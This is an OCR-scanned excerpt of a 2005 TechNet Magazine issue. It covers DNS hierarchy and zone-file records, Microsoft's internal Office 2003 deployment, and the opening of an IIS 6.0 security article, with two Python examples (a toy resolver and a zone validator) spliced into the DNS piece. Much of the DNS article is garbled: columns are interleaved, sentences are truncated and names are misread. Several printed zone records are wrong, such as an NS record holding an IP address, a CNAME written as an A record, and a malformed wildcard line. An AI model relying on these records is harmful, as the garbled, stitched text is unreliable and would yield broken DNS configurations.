As you know, hosts connected to the Internet are each assigned a unique 32-bit IP address, usually expressed in a dotted decimal notation of four 8-bit numbers, such as 127.0.1.25. DNS is distributed and hierarchical; its information is spread among thousands of servers all over the world. Any one of these servers may be considered authoritative for some specified section of the DNS database, but it may need to get information about other parts of the database from other servers. What this means in practice is that your local name server doesn't have all the information for, say, www.technetmagazine.com, but it can figure out who to ask about it and find out for you when you make a request.

Figure 1 DNS Hierarchy

How DNS Is Organized

At the top of the DNS hierarchy are 13 root name servers, which contain name server information for all of the generic top-level domains such as .com and .org as well as country-specific DNS addresses such as .uk or .nz. The name servers for each of these top-level domains contain name server information for domains within that top-level domain. So the name server for .com will contain information about microsoft.com but will not contain information about microsoft.co.uk. Your name server will have to contact the server that contains the information for .co.uk.

The hierarchy goes from the least specific top-level domain to the most specific hostname (see Figure 1).

All DNS records actually end with the period character (.) which represents the root of the DNS hierarchy, but it's rarely printed and is usually just assumed. A domain name that includes the trailing period character is said to be a Fully Qualified Domain Name (FQDN). However, domain names where the period character is implicit are also commonly referred to as FQDNs.

The hierarchy begins with the base of "." and becomes more specific moving from right to left. Figure 2 explains it and compares it to a phone number. Just as you shouldn't expect that the phone number (212) 555-1234 will lead to the same place as (425) 555-1234, you should not expect that the URLs www.example.com and www.example.org will be the same. You shouldn't even expect that fire.ice.example.com and fire.light.example.com will be the same machine—just as you wouldn't expect the telephone numbers (710) 555-1234 and (800) 707-1234 to ring on the same phone. There are billions of pieces of information spread out in tens of millions of domains, all stored in thousands, if not millions of DNS servers worldwide, and all of this information is stored in zone files.
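To make the right-to-left hierarchy and the "figure out who to ask" behavior concrete, here is an added example that is not part of the article: a toy iterative resolver in Python that normalizes names to FQDNs, walks a constructed root, .com, example.com delegation chain, and caches each answer for the TTL the authoritative server supplied, which is the caching behavior the article describes later. The zone data is constructed; the addresses come from documentation ranges and are not real servers.

```python
import time


def to_fqdn(name):
    """Normalize a name to a Fully Qualified Domain Name with the trailing root dot."""
    return name.strip().lower().rstrip(".") + "."


def hierarchy(name):
    """Labels from the root down, reading the name right to left as in Figure 2."""
    labels = [lbl for lbl in to_fqdn(name).split(".") if lbl]
    return ["."] + list(reversed(labels))


# Constructed zone data (not real servers). Each zone holds its own records plus
# NS "pointers" for the child zones it delegates, as the article describes.
# Addresses are from the documentation ranges 192.0.2.0/24 and 198.51.100.0/24.
ZONES = {
    ".": {"ns": {"com.": "192.0.2.1"}, "records": {}},
    "com.": {"ns": {"example.com.": "192.0.2.2"}, "records": {}},
    "example.com.": {
        "ns": {"office1.example.com.": "192.0.2.3"},
        "records": {"www.example.com.": ("198.51.100.10", 300)},   # (address, TTL seconds)
    },
    "office1.example.com.": {
        "ns": {},
        "records": {"fire.office1.example.com.": ("198.51.100.20", 60)},
    },
}


class Resolver:
    """A local name server that holds no zone data itself and resolves iteratively."""

    def __init__(self, clock=time.time):
        self.clock = clock          # injectable clock so TTL expiry can be exercised
        self.cache = {}             # fqdn -> (address, expires_at)
        self.queries = []           # zones consulted, in order

    def resolve(self, name):
        """Return (address, served_from_cache); address is None if nobody is authoritative."""
        fqdn = to_fqdn(name)
        cached = self.cache.get(fqdn)
        if cached and cached[1] > self.clock():
            return cached[0], True              # still within the TTL: no queries made
        self.cache.pop(fqdn, None)              # expired entry is deleted, then re-queried
        zone = "."                              # every lookup starts at the root servers
        while True:
            self.queries.append(zone)
            data = ZONES[zone]
            if fqdn in data["records"]:
                address, ttl = data["records"][fqdn]
                self.cache[fqdn] = (address, self.clock() + ttl)
                return address, False
            # Follow the most specific delegation the name falls under.
            referrals = [z for z in data["ns"] if fqdn.endswith("." + z)]
            if not referrals:
                return None, False              # no server in this chain knows the name
            zone = max(referrals, key=len)
```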


Regis Donovan has worked in the IT field for over 10 years, including 5 years at Microsoft. For most of her time in IT, she has supported enterprise-wide DNS infrastructures. She is currently employed by Upromise.com.

Data Stored in Zone Files

A DNS server that is authoritative for a given domain has a zone file that either contains all the information for that domain, or contains some information for that zone along with pointers for where to find information for subdomains within that domain. The name server that is authoritative for, let's say, example.com might have all of the information for all of the hosts whose names just end in example.com and pointers to the name servers that are authoritative for office1.example.com and office2.example.com. This kind of delegation allows for the decentralization of DNS data so that local changes can be easily made at the local level.

Information stored on a server not considered by servers higher up in the hierarchy to be authoritative for the zone in question will likely never be seen by other hosts on the Internet. If the .com servers don't list my server as a name server for the example.com domain, then no hosts on the Internet will know to ask my server for information about example.com. Any time you register a new domain, or move a domain's name servers from one set of hosts to another, you have to work with your domain name registrar to make sure that DNS servers on the Internet will know to ask your DNS server for information about your domain.

When a DNS server learns a new piece of information as the result of a query for a client machine, it will cache that information for a while—the actual cache time is specified by the server that provided the authoritative information. During that time, client machines that ask for that particular piece of information will be given the cached information; the DNS server will perform no further queries to find out if the information has changed until it deletes the cached entry when the time to live (TTL) expires or the entire cache is cleared.

Figure 2 A Phone Number in the Hierarchy

Hierarchy     Description
www.microsoft.com.
.             The base of the hierarchy
com           The com. top-level domain
microsoft     The domain microsoft within .com
www           The host www within the domain microsoft.com.
1 (212) 555-1212
1             The country code for the United States
212           The area code within the United States
555           The exchange within the area code 212
1212          The specific telephone line in (212) 555

Setting Up a Windows DNS Server

On Windows Server 2003, DNS server installation is available through the Windows Components Wizard in Components | Networking Services | Detail | Subcomponents | Domain Name System. DNS Server software is automatically installed as part of Active Directory setup. This can also be done through the Configure Your Server wizard.

Once the DNS server software has been properly installed, you can configure the DNS service on that host from within the DNS service console section of the Microsoft Management Console (MMC) or using the dnscmd.exe command-line utility. To manage the DNS server, use the Connect to the DNS server dialog to connect to the DNS server in question, which is either the local machine or a remote machine that you specify on your network.

A caching-only server does not require any DNS zones to be configured or loaded because it does not have any information that is served to the rest of the Internet. It is
is up to date before deploying the server into production, however; this information, stored in systemroot\system32\dns\cache.dns, contains pointers to the root DNS servers where your server will begin all queries in the absence of other, more specific information. As of this writing, the authoritative location for the root hints file is ftp://ftp.rs.internic.net/domain/named.cache.

Setting Up a DNS Zone

To configure a secondary zone while using the MMC to manage the DNS server, select Action | New Zone, and select secondary when prompted for the zone type. Enter the zone name and IP address of the primary server when prompted. Note that if the primary server is not set up to accept zone transfers from this server or if the zone transfer traffic (TCP port 53) is blocked by network filters or firewalls, your server may not be able to successfully provide authoritative DNS service for the configured zone.

Configuring a primary server is a bit more complicated. The New Zone Wizard will prompt you for the minimum information required for a zone file, beginning with the elements of the Start Of Authority (SOA) record. The SOA record has a number of fields that specify the domain name for that zone file, the primary DNS server, the responsible person, the TTL for records in that zone file, and instructions to secondary name servers for how often to check for new information and how long to keep serving the information if the primary becomes unreachable. Figure 3 has a rundown of the fields in an SOA record.

The Primary server should be the server 
where you are configuring the zone. The 
Responsible Person should be the e-mail 
address of the person or group that admin- 
isters the domain. Traditionally, this has 
been the e-mail alias hostmaster, just as e- 
mail issues are traditionally directed to 
postmaster. Instead of an @ character, use a 
period, so that the e-mail address host- 


master@example.com would be entered as 


hostmaster.example.com. 
You may be asked for an initial serial 


~ number. This can be any integer, and while 
/ some DNS administrators prefer simple 
wise to check that the root server hints file © 


numbering of zone file versions, others pre- 


Figure 3 Fields in an SOA Record 


' SOA record. Every domain’s zone file must 
| have one and only one SOA record. 


SOA Field Description 

Name The name of the zone. 

TTL Time to Live. 

__Nameserver The primary or master DNS for this zone. __ ag 

Mail address E-mail of the person responsible for the zone. 

Serial Unsigned 32-bit value in range 1 to 2147483647. It must be incremented 
when changes are made to the zone file. fe 

Refresh Frequency in seconds that the record will be refreshed. Frequency that a 
secondary name server will poll the primary to check for changes. 

Retry Number of seconds between failed retries when updating secondary 
servers or trying to contact a primary server. Number of seconds after a 
failed refresh for a secondary server trying to contact a primary 

j : nameserver. Be S 

Expiry The time at which the zone becomes no longer authoritative and a new 
interrogation of the root servers is required. The time at which a 
secondary nameserver becomes no longer authoritative for the zone if the 

____ server has been unable to contact the primary. 

Minimum Caching duration. 


fer date-based numbering such as | 
2004062101 for the first file edit on June | 


integer, regardless. 
The Refresh Interval determines the in- 


data. A typical refresh interval is 15 min- 
utes (or 900 seconds). 
If a secondary name server was unsuc- 


transfer to get a new copy of a zone file — 
from the primary server, the Retry Interval _ 


for a zone indicates how long the second- 


ary server should wait to attempt another | 


zone transfer. This should be shorter than 


utes (600 seconds). 

Ifa secondary name server continues to 
be unable to communicate with the pri- 
mary server, it should eventually stop re- 


sponding because the zone file data it has is _ 
no longer reliable. This happens when the | 
Expire time interval has elapsed. This is 
typically 24 hours (86,400 seconds) but © 
may be set to be longer. If your primary | 
name server is going to be unavailable for — 
longer than the usual expire time, make sure 


to increase the expire time so that the sec- 


ondary servers will keep serving DNS data | 


in the interval. 


The TTL tells caching servers how long | 


www.technetmagazine.com 


most users, will be receiving the new infor- 


tative. If this was the zone file for the do- 


almost exclusively used for Internet ad- 
dresses. The “SOA” indicates that this is an 


The other requirement for a zone file to 


_ be functional is a resource record listing at 
| least one name server for the domain. In a 
| text zone file, this record would look like 
the following: 


example.com. IN NS nsl.example.com. 


_ This code defines nsl.example.com as a 

- name server (NS) for example.com. There 

' also must bea resource record that lists the 

_ address associated with the name nsl.ex- 

_ | ample.com. If the IP address of nsl.ex- 
' ample.com was 10.1.2.3, the A record 
- would look like this: 


nsl.example.com. IN NS 10.1.2.3. 


_ All authoritative name servers for a given 
/ domain, even if they are not themselves 
_ members of the domain, need to have NS 
to keep the information they receive as the — 
| result of client queries. The default for this 
21, 2004. The DNS server treats it as an is one hour (3600 seconds). If you make a 
| change to your DNS, you should expect that 
_ most DNS servers on the Internet, and thus 
terval in seconds for how often a secondary | 
name server will poll to see if there is new mation after the TTL interval has passed 
' and all caching servers should be reporting | 
_ the updated data. There is no reliable way 
| to issue a NOTIFY to caching servers to 
cessful in its attempt to poll the primary _ push changed data to the general Internet 
server to see if it should perform a zone | population. 

If you were to look at your DNS zone file | 
as a text file, the SOA record would look © 
something like Figure 4. 
' The @ character is a zone file variable | 
_ that stands in for the fully qualified domain 


the Refresh Interval; the default is 10 min- | name for which that the zone file is authori- 


records listed in the zone file. 

The rest of the DNS zone file is made up 
of resource records. There are several dif- 
ferent kinds of resource records, each of 


_ which defines a different attribute for a given 
‘ host. The most common is A, the address 
_ record which creates a link between a given 


hostname and an IP address. 
The MX record designates a Mail Ex- 


_ change host for a given domain. The re- 
' source record specifies the domain to which 
_ the MX record applies, the priority of this 


MX server, and the server to which mail 
should be sent. The priority allows you to 


' set up primary and backup mail servers, 


and the host with the lowest priority is con- 


| sidered the primary mail server. If the pri- 
' mary mail server is unavailable, the host 
_ sending mail should attempt to send the 
_ main name example.com, you could replace 
| it with example.com anywhere the @ ap- 
_ peared in the file. 
The“IN” indicates that these are Internet | 
| records. DNS was developed to work witha _ 
number of types of addresses, but is now » 


mail via the host with the next lowest prior- 


| ity,and soon. 


If you want to create a nickname for an 
already established machine, the CNAME 
resource record will allow you to do so. For 
example, you could define a name like 


Figure 4 DNS Zone as Text File 


@ IN SOA nsl.example.com. hostmaster.example.com. ( 
1 ; serial number 
3600 ; refresh [1h] 
600 ; retry [10m] 
86400 ; expire [1d] 
3600 ) ; min TTL [1h] 


Winter 2005 85 


fas.example.edu to point to the longer name 


faculty-of-arts.example.edu. like so: 
faculty-of-arts.example.edu. IN A 10.1.1.2 
fas.example.edu. IN A faculty-of- 
arts.example.edu. 


Another common use of CNAME 


records is to create multiple names point- 


_ ing to a single multi-purpose host, like — 
' master to make one change to the record of 


mail.example.com and ftp.example.com. 
In production, one common use of 


CNAME records is to make it easier to | 


maintain a set of hostnames that all lead to 
a single machine. This allows the host- 


the host that the CNAMEs lead to and have 


zone files are more compli- 


DNS servers that are not authoritative for any © 
domain but which provide DNS service to client | 
machines are called caching-only servers. They © 
are the simplest type of DNS servers to config- _ 
ure. The DNS servers that store the authorita- 
tive information about one or more domains in | 


this change the records for all of the 


the DNS server is first set up and incremented auto- 

matically when changes occur or the domain adminis- 

trator may be responsible for updating the number 

manually. If the number on the primary server is nu- 

merically larger, the secondary server will initiate a 

zone transfer, and download the entire zone file from 
the primary server (see Figure A). 


cated to configure. These 
servers are broken down into 
two groups: primary servers 
and secondary servers. 

You can set up the server 
to be either a primary or sec- 
ondary server for a given 
zone. The primary server is 
the authoritative source for 
the information in a zone; any 
changes made to a zone must 
be made on the primary 
server. A zone must have a 
primary server. 

A secondary server is listed 
as being authoritative for a 
given zone, but whereas the 
primary server has the zone 
file stored locally, the second- 
ary server pulls the zone in- 
formation from the primary 
server upon startup and 
whenever the information on 
the primary server has 
changed. Thus the keeper of 
the changes is the primary 
server. A zone may have from 


Y) 
pa 
oO 
> 
— 
oO 
Y) 
a0 
= 
ie 
O 
© 
>) 
> 
< 
© 
12 
exe 
O 
O 
Oo 
Y) 
> 
— 
qe) 
= 
= 
O_ 


Start Refresh 
timer. 


Has the 
Refresh timer 
for this zone 

expired? 


Send a query 
to the primary 
DNS server for 

this zone. 


Is the 
serial number 
from the primary 
server larger than 
the stored serial 
number? 


Sansa Upaase 


ated 
copy of zone from 


Under most versions of DNS 
server software, if the new serial 
number is numerically smaller than 
the old serial number—through in- 
teger overflow or a change in serial 
number format, for instance—the 
secondary server will fail to load 
the new zone file until the local 
cache, including secondary DNS 
files, is cleared. 

The NOTIFY operation lets sec- 
ondary servers learn of changes au- 
tomatically. If a primary server is 
configured with a NOTIFY list of 
secondary DNS servers for a given 
zone file, it will then alert those 
secondary servers when there have 
been changes made to the zone 
file. The secondary servers will ac- 
knowledge the NOTIFY request and 
poll the primary server as it does 
when the TTL expires. 

The difference between a second- 
ary server and a caching server is 
that a caching server only queries 
for the specific records it needs and 
will discard those records when their 


primary ser r via 


one to several secondary serv- 
ers. Hosts on the Internet per- 


forming name lookup for a zone will generally | 
try the first DNS server listed for a given zone. | 
Most DNS server software will round-robin to | 


rotate through a given set of records as a way to 
achieve some primitive load balancing. 


the secondary server checks for new informa- 


number it has stored. Depending on the server 
software, the serial number may be chosen when 


86 TechNet Magazine 


Figure A Primary/Secondary Servers 


TTL expires. A secondary server will 
download the zone files of the zones 
for which it is authoritative. A secondary server will 
download the entire zone rather than just the specific 
records a user requests, and it will keep the zone file 


_ information until it has been unable to reach the 
| primary server for some long period of time (often a 
When the Refresh timer for a zone expires, | 
_ the Start Of Authority section of the zone file on the 
tion by comparing the serial number of the — 
current zone on the primary server to the serial | 


week or more). These time intervals are configured in 


primary server. 
Almost all primary and secondary DNS servers also 


_ provide a caching service for queries about records 
_ for which they are not authoritative. 


hostnames. A limitation of a CNAME | 
record is that it should not be used for a | 
record that already has other entries. If you 
want your Web server, www.example.com, — 
to point to the same machine as exam- | 
ple.com, you cannot have a record that | 
points example.com to www.example.com, | 
since example.com already has other re- | 
source records such as NS and SOA records. 
One way to think about why this won't work | 
is to consider that there is no way for DNS | 
to knowif you mean the host example.com | 


or everything ending in example.com. 


So while this is okay, 

www.example.com. IN CNAME example.com. 
this is not: 

example.com. IN CNAME www.example.com. 


If you do want everything ending in a | 
given domain to go to a specific host, you _ 
can use a wildcard record: a CNAME of * | 
within that domain that points to the host 


| The Other Side of DNS 


to which all names that are not already de- 


fined should point. With the following 
record in place, any hostname that is not _ 
explicitly defined will be treated as a — 


CNAME for wildhost.example.com: 


* example.com. IN CNAME 
wildhost.example.com. 


While this can be convenient, it does run — 
the risk of making hostnames like example- 
is-a-bunch-of-idiots.example.com returna _ 


valid response. 


Inall the examples so far, we’ve seen fully | 
qualified domain names. If a resource | 
record does not usea FQDN, DNSassumes | 


that the zone name should be appended. 

So in this case, 
foo.example.com. 

is equivalent to: 
foo IN A 10.128.5.22 


IN A 10.128.5.22 


If you leave off the trailing period in a | 


www.technetmagazine.com 


Where to Learn More 


While this article has provided information about DNS in general as well as 
the Windows DNS server, there are many useful Web resources with informa- 
tion about DNS. The MSDN list of DNS standards documents ts available at 
msdn.microsoft.com/library/en-us/dns/dns/dns_ standards documents.asp. Information on DNS 
in Windows 2000 is available at www.microsoft.com/Windows2000/technologies/communica- 
tions/dns. Information on the Windows Server 2003 implementation of DNS 
can be found at www.microsoft.com/resources/documentation/WindowsServ/2003/standard/ 


proddocs/en-us/sag DNS imp. PlanningNode.asp. 


For more generic information about DNS, such as DNS standards and 
software as well as other implementations of DNS server software, the DNS 
Resources Directory is available at www.dns.net/dnsrd. 


| FQDN, DNS will still assume that the zone | 
_ name should be appended. So that 


foo.example.com IN A 10.128.5.22 


as 10.128.5.22. 


The Domain Name System has two ma- 


jor branches. The part we've discussed so _ 
far creates a mapping of names to IP ad- 
dresses; the other creates a mapping of IP _ 
_ data locally. 


If you have a small 
Internet presence, 
it’s possible that your 
ISP may maintain the 
reverse DNS records. 


_ addresses to names. The latter is done by — 
' means of PTR (or Pointer) records. The 
~ domain in-addr.arpa holds all IP address 
| to name mappings. 

The PTR record links an IP address with | 
aname, and it lists the four octets of the IP _ 


address in reverse and appends the PTR 


domain of .IN-ADDR.ARPA. A PTR 
- record linking 10.128.5.22 to foo.ex- 
will create a resource record defining the IP 
address of foo.example.com.example.com 


ample.com would be: 


22.5.128.10.IN-ADDR.ARPA. 
foo.example.com. 


IN PTR 


If you have a small Internet presence, it’s 


possible that your ISP may maintain the 


reverse DNS records. As long as the reverse 
zone is delegated to you, you can create a 
reverse zone, as PTR zones are called, and 
then manage your own IP address-to-name 


Some hosts, particularly hosts that re- 


ceive mail, will check that a forward and 
_ reverse lookup for a given host have match- 
| ing records. If they do not match, the host 
_ will refuse to accept mail. It's worthwhile to 
_ verify that your mail servers have matching 
_ forward and reverse DNS information. 


DNS problems can be difficult to 
troubleshoot. One way to approach trouble- 
shooting is to perform lookups against a 
remote DNS server to make sure that ma- 


chines out on the Internet are looking to 


the right servers and getting the correct in- 
formation for your DNS zones. ® 
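The zone-file rules laid out above (exactly one SOA record, a Retry Interval shorter than the Refresh Interval, an NS record backed by an A record, no CNAME on a name that already has other records, and the zone name silently appended to any name that lacks its trailing period) can be checked mechanically before a zone goes live. The following is an added example, not code from the article or from the Windows DNS server: a small Python validator for the text-zone syntax shown in Figures 3 and 4, run over a constructed sample zone that deliberately contains the two mistakes the article warns about.

```python
"""Sanity checks for a text zone file, following the rules the article states.

Added example, not code from the magazine. It parses the text-zone syntax
shown in Figures 3 and 4 (an SOA with parenthesised fields, NS/A/CNAME
records, '@' and trailing-period handling) and applies the checks the
article describes. The sample zone is constructed; its names and 10.x
addresses are illustrative only.
"""
import re
from collections import defaultdict

ORIGIN = "example.com."

# Constructed sample. The last two records are deliberately wrong:
# 'foo.example.com' lacks its trailing period, and the apex CNAME collides
# with the SOA and NS records that example.com. already has.
SAMPLE_ZONE = """\
@    IN SOA ns1.example.com. hostmaster.example.com. (
         2004062101 ; serial, date-based: first edit on 2004-06-21
         900        ; refresh [15m]
         600        ; retry   [10m]
         86400      ; expire  [1d]
         3600 )     ; min TTL [1h]
@                IN NS    ns1.example.com.
ns1              IN A     10.1.2.3
www              IN CNAME example.com.
foo.example.com  IN A     10.128.5.22
example.com.     IN CNAME www.example.com.
"""


def qualify(name, origin=ORIGIN):
    """Zone-file naming rules: '@' means the origin, a trailing period marks
    a FQDN, and anything else has the origin appended, even a name that
    already looks complete, such as 'foo.example.com'."""
    if name == "@":
        return origin
    if name.endswith("."):
        return name
    return f"{name}.{origin}"


def parse_zone(text, origin=ORIGIN):
    """Return (owner, type, rdata) tuples with all names qualified and the
    five SOA timers converted to integers."""
    body = re.sub(r";[^\n]*", "", text)              # strip ; comments
    body = re.sub(r"\(([^)]*)\)",                    # join ( ... ) onto one line
                  lambda m: " ".join(m.group(1).split()), body)
    records = []
    for line in body.splitlines():
        fields = line.split()
        if not fields:
            continue
        owner, _class, rtype, *rdata = fields
        if rtype in ("NS", "CNAME", "PTR"):
            rdata = [qualify(rdata[0], origin)]
        elif rtype == "SOA":
            mname, rname, *timers = rdata
            rdata = [qualify(mname, origin), qualify(rname, origin)]
            rdata += [int(t) for t in timers]
        records.append((qualify(owner, origin), rtype, rdata))
    return records


def check_zone(records, origin=ORIGIN):
    """Apply the article's rules; return a list of problem descriptions
    (empty when the zone passes)."""
    problems = []
    types_by_owner = defaultdict(list)
    for owner, rtype, _ in records:
        types_by_owner[owner].append(rtype)

    soas = [r for r in records if r[1] == "SOA"]
    if len(soas) != 1:
        problems.append(f"zone must have exactly one SOA record, found {len(soas)}")
    else:
        _, _, (_m, _r, serial, refresh, retry, expire, _minimum) = soas[0]
        if not 1 <= serial <= 2147483647:
            problems.append(f"serial {serial} is outside 1..2147483647")
        if retry >= refresh:
            problems.append(f"retry ({retry}s) should be shorter than refresh ({refresh}s)")
        if expire <= refresh:
            problems.append(f"expire ({expire}s) should be longer than refresh ({refresh}s)")

    ns_targets = [rdata[0] for owner, rtype, rdata in records
                  if rtype == "NS" and owner == origin]
    if not ns_targets:
        problems.append("zone needs at least one NS record for " + origin)
    for ns in ns_targets:          # an in-zone name server needs an A record
        if ns.endswith("." + origin) and "A" not in types_by_owner.get(ns, []):
            problems.append(f"name server {ns} has no A record in the zone")

    for owner, rtypes in types_by_owner.items():
        if "CNAME" in rtypes and len(rtypes) > 1:
            others = ", ".join(sorted(set(rtypes) - {"CNAME"}))
            problems.append(f"{owner} is a CNAME but also has {others} records")
        if owner.endswith(f".{origin}{origin}"):
            problems.append(f"{owner}: origin appended twice, missing trailing period?")

    return problems


if __name__ == "__main__":
    for problem in check_zone(parse_zone(SAMPLE_ZONE)):
        print("PROBLEM:", problem)
```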




A 200,000+ Desktop Deployment

Deploying a major software application such as Microsoft Office 2003 or Microsoft Windows XP Professional throughout a global enterprise can be a challenge for any IT organization. And just because Microsoft wrote the software doesn't mean internal deployment is a simple process. If you ever wanted to look inside Microsoft to catch a glimpse of how the Microsoft IT team does deployment, get out your notebook because I'm going to run you through the steps they took to deploy Office 2003 in several iterations, from the first beta release to the final version.

The Beta Deployment Cycle

The Microsoft approach to the development of reliable software includes the wide-scale deployment of pre-release applications to employees' computers—a practice known as "eating your own dog food." The feedback that the product development groups glean from this process is invaluable and helps ensure quality in the development phase. On the installation and deployment end, the dog food process provides Microsoft IT teams with valuable quality control experience.

IT/LOB Application Testing

There is always a potential for compatibility problems when deploying any new version of software, software update, or service pack. To minimize this risk, Microsoft IT maintains a central data repository containing information on every known line-of-business (LOB) application. The database is accessible via an intranet portal, so interested parties can easily generate reports detailing which technologies an application has been built with or has dependencies on.

For example, when planning the deployment of a Windows XP Professional Service Pack, Microsoft IT was able to report any applications that have dependencies on Microsoft Internet Explorer, ActiveX controls, firewalls, and so on. Such a report can contain other pertinent information including the e-mail address of the app owner or person responsible for testing it, as well as the number of clients using it.

At each dog food deployment milestone (Beta 1, Beta 2, and so on), applications are tested for compatibility and any problems are identified and corrected before the final release. For example, when Microsoft tested Office 2003, they discovered that there were a number of apps relying on the Office XP Web Components that would require updating to the newer version.

Feature Scenarios

The Microsoft IT team runs a variety of scenarios throughout the testing process. These scenarios simulate various dependencies in which new features require other applications to help them run. For example, the Cached Exchange Mode functionality of Microsoft Outlook 2003 requires Microsoft Exchange 2003 to be running for the full functionality to be available. And because an Exchange Server migration and consolidation project and some user training were occurring at the same time as the Office 2003 deployment, the timing of the upgrades had to be planned carefully.

For more information on the Exchange server consolidation project, see the article Deploying a Worldwide Site Consolidation Solution for Exchange Server 2003 at www.microsoft.com/services/microsoftservices/pdo_server.mspx.

Deployment Customizations

In order to validate certain feature scenarios, the Microsoft IT team must deploy custom Office 2003 settings. For example, the team deployed all Outlook 2003 e-mail clients with the Cached Exchange Mode turned on by default.

Because much more software deployment happens at Microsoft than in a typical organization, creating a painless end-user experience is paramount for the Microsoft IT team. For this reason, the IT team does as much of the work for the user as possible. Product keys are entered automatically, End User License Agreements are accepted, and the installation user interface is reduced to only a progress bar and completion message, all to make the process less taxing on the end users.

To build these customized installations, the Microsoft IT team uses the publicly available customization tools found at the Microsoft Office Web site at www.microsoft.com/office/ork/2003. The Custom Maintenance Wizard, which allows many aspects of the application to be tuned to any environment, was the primary customization tool used for the Office 2003 deployment. Figure 1 shows the intuitive interface of the Custom Maintenance Wizard.

Figure 1 Custom Maintenance Wizard (screenshot of the Microsoft Office 2003 Custom Maintenance Wizard: a settings tree with a node for each Office 2003 application plus machine and user settings, and a choice between "Show all settings" and "Show configured settings only". The dialog notes that the settings in the CMW file are applied to all users on the computer where it is deployed and overwrite existing settings, and that only configured settings are applied.)

Even at Microsoft, users rarely change the way they work with applications after the installation of new software. When new technology is deployed, one of the biggest challenges is teaching employees how to take advantage of new features and improvements. To address this problem, Microsoft IT selects a limited number of new features and improvements, creates targeted education materials, and delivers them through several channels—brown-bag lunchtime presentations, webcasts, and intranet Web site documentation. An effective employee education vehicle has been "Quick Tip" e-mails, which list three new features per e-mail and provide enough instruction to get started with the feature.

Delivery

After the installation was customized and tested, Microsoft IT deployed the Office 2003 package using Microsoft Systems Management Server (SMS) 2003. SMS provides a complete solution that includes replication of the installation package, delivery to the client desktop, and reporting to confirm the success of the deployment. SMS helped make the installation as seamless as possible. SMS can often install and update applications without the employee even being present at their computer. Users really appreciate that!

Phased Deployment

The Microsoft IT team routinely takes a phased approach to software deployment, focusing at first on a small group of clients so that the IT team can refine the deployment process and gain key feedback regarding support questions, application issues, and installation experience. The phased approach results in a more efficient and streamlined deployment to the larger group later on, as the most common client questions and problems have already been addressed in the smaller trial groups.

Effective support is especially challenging during a dog food period because the app support documentation is often not complete. Phased deployment is important as it gives the support team time to build fixes and workarounds for the top support call issues before the app is widely deployed.

Reporting

No deployment is complete without the ability to report on its success. Reporting speed is critical for Microsoft IT, as a given beta deployment may have a goal that must be met in a short time. For example, the Microsoft Office 2003 Beta 2 deployment goal was to reach 30,000 desktops in eight weeks, and effective reporting helped to meet and exceed this objective. The application was deployed to 7,000 more desktops than targeted in those weeks.

SMS 2003 provides reporting that allowed the Microsoft IT team to quickly determine which computers received the installation package, which ones ran it successfully, and which were not successful.

Steve Reay is a Program Manager within the Microsoft IT organization and has worked in a variety of support and deployment roles within IT at Microsoft since he joined 10 years ago.




TechNet Magazine, a joint publication of Microsoft Corporation and CMP Media LLC, is offering a special edition to qualified IT professionals. TechNet Magazine will provide in-depth, hands-on technical information that IT professionals can use in their daily work, covering the most current solutions for managing IIS, Exchange Server, Active Directory, Office, Windows Server, and much more.


Brett Hill 


IS 5.0 administrators are familiar with 
the important security-related tasks re- 
quired to harden and maintain a secure Web 


services environment. The many new fea- | 
tures and capabilities of IIS 6.0, available | 


with every version of Windows Server™ 


2003, renders the previous version obso- — 
lete. If you're like me, when I first opened _ 
the IIS 6.0 user interface, I was surprised at 


how familiar it seemed. If you can config- 


ure security for an IIS 5.0 server, youre well 
on your way to managing an IS 6.0 server. | 


Nevertheless, experienced IIS administra- 


tors are sometimes caught by surprise try- 


ing to get their IIS 5.0 applications to work 
on IIS 6.0, prevented from doing so in cer- 
tain scenarios because of the new security 
defaults and design. 

With just a little research, you can avoid 


the bumps in the road that you would oth- | 


erwise most certainly encounter. In this ar- 
ticle, Pll review a few of the most important 
new items to add to your “must do’ list, and 
[ll highlight how you can improve security 
in ways not possible before. 


Identify Entries for Web 
Service Extensions 

The troubleshooting question IIS ad- 
ministrators ask most frequently when they 
first deploy IIS 6.0 involves a new feature 
that is a bit surprising when first encoun- 
tered. In the IIS Manager console, a new 


Brett Hill is an IIS MVP and runs IISTraining.com, IISFAQ.com, 
and IlSAnswers.com. He is a regular speaker at TechEd and 
Windows Connections conferences, and is considered one of 
the nation’s leading authorities on IIS. You can reach Brett at 
www. iistraining.com. 


www.technetmagazine.com 


node has been added called Web Service | 

Extensions (WSE), shown in Figure 1. 
Dontlet the innocent sound of WSE lead 

you to believe that you can deal with this 


SERVING tHe 


Essential Security Administration for IIS 6.0 


WEB 


executables and libraries are allowed to run 
on the Web server, and by default, nothing 
is allowed to run. (No, I’m not kidding.) 
Even if you set NTFS permissions to give 


' everyone full control, unless you specifi- 


if you can configure 
security for an IIS 5.0 
server, you’re well on 
your way to managing 
an liS 6.0 server. 


after you get your application up and run- 
ning. WSE has nothing to do with XML | 
Web Services or FrontPage” Server Exten- | 
sions. Rather, these settings control which 


© File Action View Window Help 


BLADE-DEFAULT (local come § 
“> Default SMTP Virtual Serv: 
&-_3 Application Pools 

id Web Sites 

_J Web Service Extensions 


Prohibit 


Properties 


IB Add a new Web service 
extension... 


Dd Allow all Web service 
extensions for_a specific 
application... 


Prohibit all Web service 
extensions 


cally allow an extension in Web Service Ex- 
tensions, IIS will not run it. This is a perfect 
example of what Microsoft means by “se- 
cure by default” 

This does not mean you will need to 
identify all scripts by full path and filename, 
but it does mean identifying all script en- 
gines. For example, in order to host 
ASP.NET applications, you must specifi- 
cally allow ASP.NET as provided by 
aspnet_isapi.dll (which can be enabled dur- 
ing installation or with the Manage Your 


Ry Internet Inforrnation Services 4 § Web Service Extensions 


: | Web Service Extension —_~ Status | 


a{@ All Unknown ISAPI Extensions Prohibited 
Y All Unknown CGI Extensions Prohibited 


Active Server Pages Prohibited 
a) Internet Data Connector Prohibited 
la] Server Side Includes Prohibited 
[2] WebDAV Prohibited 


Figure 1 IIS Manager 


Winter 2005 91 


Figure 2 Unique Extensions : 


Extension Query 
Jpg 1306544 
gif 790245 
htm 407679 
asp 222184 
-png 176696 
GIF 32983 
ico 23439 
. txt 19564 
11 4502 
-eXe 2379 

. php 2233 
«htm 2065 


“allow” rule for all DLL and executable files 
you invoke from a URL or redirect. 

If you absolutely, positively have to get 
running today, you can set Web Service Ex- 
tensions to not enforce any restrictions by 
enabling Allow All Unknown ISAPI or Al- 
low All Unknown CGI, but in doing so you 
give up a great defensive security feature 
that can help protect you against current 
and future exploits. The following is a tip 


on how to quickly identify all the required 


entries you will need. 


Identify Required Entries

